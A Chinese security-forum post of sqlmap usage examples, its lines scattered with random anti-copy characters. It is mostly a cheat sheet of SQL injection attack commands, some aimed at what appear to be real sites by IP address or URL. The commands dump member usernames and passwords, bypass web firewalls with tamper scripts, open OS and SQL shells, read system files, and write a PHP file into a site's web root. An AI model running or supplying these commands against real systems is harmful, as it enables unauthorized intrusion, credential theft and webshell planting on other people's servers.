找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1927|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap6 `0 b* l8 |1 K( p  i6 j% c5 c0 I- u" G6 O

. [% O2 }6 I% i7 p9 x0 f% k5 qupdate :::::>     in the folder   after  execute    following   order : svn update6 q7 q: U- F9 u3 K

& o  p% q8 X/ }5 xsqlmap.py -r 1.txt --current-db: O* O9 b7 }! M/ B' O

8 e" Q) P  }% Q+ Z' o" k& D3 P( K( T7 Zv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
: c) v% d/ p# P& N( @0 e- R! R; M% y3 p8 f. V
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
$ R' V& A6 r, u( w3 c猜解数据库
; ^& @/ c% D3 w8 c" f% G./sqlmap.py -u "injection-url" --dbs
# ~2 j; j! r2 t* v6 Usqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
5 m7 l* w6 L8 V/ `: S+ [: I; k4 ]5 Y6 Y5 {' L" N( F, k7 X' u
猜解表名7 N8 M0 Z/ p. |( ^2 h' B
./sqlmap.py -u "injection-url" -D database_name --tables
1 O2 |+ _! X3 m5 _5 L5 i/ g. X& M. d3 l% J" K" g4 E
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"% w6 E/ Y0 c. \. Y$ ^& v
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" " w* n8 W0 F' C( `' C' A/ X
. P$ X$ c& ~/ u$ h2 x
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
# e4 v- d' L: E2 ~) x, R* R5 ]  |- o
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"6 g5 U: M: ~- ]
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
* a6 j2 J* F) n3 b8 _sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" ( _, Q/ K9 B$ S2 v1 A- M
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"8 T1 p5 I/ |$ d/ r4 r1 i% ]6 a

* C( v$ d' o+ [$ N# i  `sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"1 I5 E8 q9 A; {# {3 S$ {: J
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
' _) T# x) O" b1 tsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"1 l8 ^: Q& e5 J1 e. l2 d& k
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
+ Z6 B/ R5 _( j* u6 k' D4 D; Osqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump& S0 ~! E9 r4 m1 Q9 G- N2 i& V
9 s% G& P' ?0 m0 V$ K
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了/ D3 l* {' |# ]  g5 r1 W9 R8 `
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
$ N5 O; [; P: G. ^6 g; N$ q+ b' F! @8 z/ f/ M2 A* ^
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"& x% }$ O# P% \$ F! `3 i5 H
猜解列名
% ^/ ~( A9 Y- L( ?1 v- g# X./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
$ u, u3 L6 i6 l. y2 j  y" n4 h: k" ]" u& A
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 4 x8 D- k; ?  S# j
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
- p; h) @4 N$ {3 ^! V1 Asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"3 i  A; d& e  ]! Q5 O; k! Q

" p7 t% V' U( `3 j7 K' a; osqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
2 n( n7 A* I& Q( W4 ^0 G&submit=Go
/ y5 Z/ A  [- f. z& P; }猜解值! |, |. g- h8 e
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump6 f# b! z; H8 A7 E! i
========================================================
. U: h& w* L7 p, K. {搜索表名中包括mana字符的
( E- v) L7 L* n, v( v/sqlmap.py -u "injection-url" -T mana --search
3 T! c: k8 E' R+ |' Q+ \- O返回一个交互式sql shell1 j# D0 K7 J+ \# ~
/sqlmap.py -u "injection-url" --sql-shell
5 F' Z$ q( {4 h# T# |2 B读取指定文件(需权限)& g: u/ q, a* p7 z# g5 l) o
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"9 n2 N/ P- V' r/ L% r) _
查看当前 用户 及 数据库 6 ?  w8 S5 J5 P. r% I3 J( m
/sqlmap.py -u "injection-url" --current-user --current-db
4 \: k& d$ V: V$ l/ y* k5 x2 T本地文件 写入 远程目标绝对路径- _3 Z2 O" p: b9 k- K
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径$ [. j- u3 ?$ M. k
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
5 b7 F; Q+ n( ]4 D4 ~3 F
& e+ \+ Q! i) isqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径$ I5 k9 Q9 o# {
查看某用的权限
( E* F- }+ a: E: D/sqlmap.py -u "injection-url" --privileges -U root
3 u# {  }* U' a+ x2 |& [查看当前用户是否为dba% P5 m% I. d' ]! ~0 f3 ^9 h9 N
/sqlmap.py -u "injection-url" --is-dba
! L# @8 Y" D$ t+ Z读取所有数据库用户或指定数据库用户的密码
# @4 P8 w0 T; q" d9 Lsqlmap.py -r 1.txt --users --passwords  n! Z/ j7 t# P/ ?2 h# t
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
& z+ F+ @8 N- L3 L
1 X. N% A4 t: o6 e9 }9 H8 F" h( ~/ M/sqlmap.py -u "injection-url" --passwords -U root. x3 Y3 }$ F4 u0 b2 S5 n# _

/ }, e: h6 A0 e--start&&--stop 与 --first&&--last 的区别+ B+ `5 A, K8 p" v. R8 X
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)4 g3 A* M' I) k6 j

2 N, w: U9 I2 v8 e- d从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
, r* t; P0 [5 q  a; O/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables9 `3 f6 A* X) X. Q9 A% y4 D$ f
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
! z# U2 r* _. R$ d( }- R$ P2 E
! Y" e4 Q9 m0 o0 Y0 }执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
3 G% @0 |/ V/ N1 {$ u& i/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"5 D3 @5 G. v1 ]( P1 }

9 U9 f$ ^8 U  G4 {+ D! ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表